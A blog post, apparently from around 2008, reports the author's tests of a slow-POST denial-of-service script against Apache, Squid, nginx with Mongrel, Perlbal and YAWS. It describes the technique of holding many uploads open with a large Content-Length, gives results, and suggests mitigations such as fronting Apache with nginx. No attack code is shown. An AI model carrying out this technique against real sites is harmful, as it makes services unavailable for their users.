This is probably old news to anyone who's run anything spammable on the web for long enough, but there are bots out there that don't do HTTP particularly well. I had this problem with the Topic Exchange years ago and it just recently hit a couple of BBM's sites. It's now fixed (for some definition of "fixed") in both cases with a Python proxy I wrote to buffer uploads and responses.
Curious as to whether other "standard solutions" out there handle this situation, and also so I could test out my proxy, I wrote a script that makes many HTTP connections to a site, writes POST headers with a large Content-Length, then feeds a byte into each of them every now and then so they don't time out, but never actually finishes the POST.
It took down my development box within seconds, driving it so badly out of memory that the Linux OOM killer kicked in and tore the thing to shreds. Reducing MaxClients in the Apache config improved the situation to the point where the machine would stay up, but the script would still make the site inaccessible (and fill up the accept queue so that nobody would be able to get in even if a request ever did get fully posted). Apache stops accepting requests when it runs out of children, so the script just started getting rejected connects after a while. Killing the script (and closing all the sockets) resulted in the site being instantly accessible again.
Trying it out with my proxy in front, I ran it for a few minutes but killed it after it established lots of HTTP connections without affecting the site. My proxy's not particularly clever so you could cause the machine to run out of swap by feeding it gigabytes of data, but it seems fine with lots of connections, at least.
Testing it on a Rails site running on a Mongrel cluster behind nginx gave similar results: no memory exhaustion (as no child processes are spawned with Mongrel/nginx) but an inaccessible site. Interestingly, the site didn't come back for a few minutes after killing the script; nginx or Mongrel took a while to process all the disconnects, or something. Correction: nginx handled the attack flawlessly. I didn't realise, but in the first test there was actually a different proxy in front of nginx, which wasn't so well behaved. So Rails hackers running nginx+mongrel_cluster can rest easy; your sites are probably not susceptible to this!
One bit of software I thought would be able to take a beating without batting an eyelash is Perlbal. And it did... to a point. It seems to use quite a lot of memory per connection, and after 500 connections (at which point it was using something like 3G of virtual memory) it printed "Out of memory!" and died. This is kind of scary, as Perlbal doesn't auto-respawn by itself (at least with the provided debian/perlbal.init script). So if you're running Perlbal you might want to run it under something like supervise or monit, or just in a simple shell script like this:
while true; do
I've pinged the Perlbal dev list about this (I'm sure it would be possible to get it to stop accept()ing in low memory situations, or perhaps have it limit the number of simultaneous connections per IP -- or if this is a bug, to fix it.)
If anyone has a service running behind a different proxy/balancer that they wouldn't mind me running the script against, please drop me a line. Or for that matter if anyone has a web service that they're concerned is easily taken down, let me know... I'd be interested to see how resilient other proxies and web servers are.
Update: Thanks to Bruce Fitzsimons for letting me take down his 3gtelcotools.com Erlang server! New result: a fairly small web server (256M RAM, single CPU) running YAWS, accepted about a thousand sockets then died completely, as with Perlbal. The error was EMFILE: too many files open. The experiment will continue after Bruce does some tweaking :)
Update 2: Bruce upped his ulimit, and I have since been unable to bring his server down. So chalk this up as a success for YAWS, with appropriate configuration. (Details: it handles 3000 simultaneous connections quite happily. Appears to be forcibly closing old connections after getting > 1000 from one IP address - or this may be a bug in my code. More results later!)
Update 3, 2008-01-4: Summary of results so far:
Apache - blocked up immediately
Squid + Apache - blocked up immediately
nginx + Mongrel - happily accepts lots of connections without service interruption
Perlbal - happily accepts lots of connections, but dies eventually due to a bug?
YAWS (Erlang) - happily accepts lots of connections without service interruption
So the safest thing to do if you're running Apache is to throw nginx in front of it. Personally I'm waiting for a Perlbal patch, then I'm going to use it, as it has some cool features and looks very debuggable.